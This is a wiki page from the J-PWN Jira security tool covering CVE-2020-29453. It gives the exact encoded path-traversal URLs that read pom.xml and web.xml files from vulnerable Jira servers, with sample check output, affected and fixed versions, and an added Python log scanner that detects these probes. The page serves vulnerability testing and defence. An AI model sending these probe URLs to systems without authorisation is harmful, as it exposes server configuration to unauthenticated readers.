CVE-2020-29453 - carnal0wnage/J-PWN GitHub Wiki

CVE-2020-29453

Category: [Info Disclosure]

module name: check_cve_2020_29453

Checks for URLs:

    {url.rstrip('/')}/s/1xqVb9EKKmXG4pzui1gHeg0yrna/_/%2e/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
    {url.rstrip('/')}/s/1xqVb9EKKmXG4pzui1gHeg0yrna/_/%2e/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.xml
    {url.rstrip('/')}/s/1xqVb9EKKmXG4pzui1gHeg0yrna/_/%2e/WEB-INF/web.xml

The only difference between this check and the check for CVE-2019-8442 is the added /%2e/ path segment.

INFO: Checking for CVE-2020-29453

- Checking URL: https://jira/jira/s/1xqVb9EKKmXG4pzui1gHeg0yrna/_/%2e/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
- HTTP Status Code: 200

- Checking URL: https://jira/jira/s/1xqVb9EKKmXG4pzui1gHeg0yrna/_/%2e/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.xml
- HTTP Status Code: 200

- Checking URL: https://jira/jira/s/1xqVb9EKKmXG4pzui1gHeg0yrna/_/%2e/WEB-INF/web.xml
- HTTP Status Code: 404
- No vulnerability detected at https://jira/jira/s/1xqVb9EKKmXG4pzui1gHeg0yrna/_/%2e/WEB-INF/web.xml

- Checking URL: https://jira/jira/s/1xqVb9EKKmXG4pzui1gHeg0yrna/_/%2e/WEB-INF/classes/seraph-config.xml
- HTTP Status Code: 404
- No vulnerability detected at https://jira/jira/s/1xqVb9EKKmXG4pzui1gHeg0yrna/_/%2e/WEB-INF/classes/seraph-config.xml

Reference: https://jira.atlassian.com/browse/JRASERVER-72014

Description

The CachingResourceDownloadRewriteRule class in Jira Server and Jira Data Center allowed unauthenticated remote attackers to read arbitrary files within WEB-INF and META-INF directories via an incorrect path access check.

Affected versions:

  • version < 8.5.11
  • 8.6.0 ≤ version < 8.13.3
  • 8.14.0 ≤ version < 8.15.0

Fixed versions:

  • 8.5.11
  • 8.13.3
  • 8.15.0
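
A defender-side counterpart to the check, as an added example that is not part of J-PWN: it scans web access logs for the request shape this module sends and separates the /%2e/ form from the CVE-2019-8442 form. It assumes common/combined log format with the raw request line; the function names and sample log lines are constructed for illustration.

```python
import re

# Path shape taken from the URLs this module requests:
#   /s/<token>/_/%2e/WEB-INF/...  or  /s/<token>/_/%2e/META-INF/...
# Without the %2e segment, the same shape is the CVE-2019-8442 check.
PROBE = re.compile(
    r"/s/[^/\s]+/_/(?P<dot>%2e/)?(?P<dir>WEB-INF|META-INF)/(?P<file>[^\s?]+)",
    re.IGNORECASE,  # %2e and %2E are the same encoded byte
)
# Assumption: common/combined log format with the raw, undecoded request line.
LOG_LINE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<path>\S+)[^"]*" (?P<status>\d{3}) '
)

def classify(line):
    """Return a finding dict for a probe-shaped request, else None."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    hit = PROBE.search(m["path"])
    if not hit:
        return None
    return {
        "client": m["client"],
        "cve": "CVE-2020-29453" if hit["dot"] else "CVE-2019-8442",
        "target": f'{hit["dir"].upper()}/{hit["file"]}',
        "status": int(m["status"]),
        # The module's output reports 404 as not vulnerable; a 200 means a file was served.
        "disclosed": m["status"] == "200",
    }

def scan(lines):
    """Classify every line and keep only the findings."""
    return [f for f in map(classify, lines) if f]

# Constructed sample lines (documentation IP range, made-up timestamps and sizes).
SAMPLE = [
    '203.0.113.7 - - [01/Mar/2021:10:00:01 +0000] "GET /jira/s/1xqVb9EKKmXG4pzui1gHeg0yrna/_/%2e/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml HTTP/1.1" 200 4312',
    '203.0.113.7 - - [01/Mar/2021:10:00:02 +0000] "GET /jira/s/1xqVb9EKKmXG4pzui1gHeg0yrna/_/%2E/WEB-INF/web.xml HTTP/1.1" 404 512',
    '203.0.113.9 - - [01/Mar/2021:10:05:00 +0000] "GET /jira/s/1xqVb9EKKmXG4pzui1gHeg0yrna/_/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.xml HTTP/1.1" 200 2100',
    '198.51.100.4 - - [01/Mar/2021:10:06:00 +0000] "GET /jira/s/1xqVb9EKKmXG4pzui1gHeg0yrna/_/download/batch/example.js HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

Findings with disclosed set to True are the ones to triage first, since the server returned the requested file rather than an error.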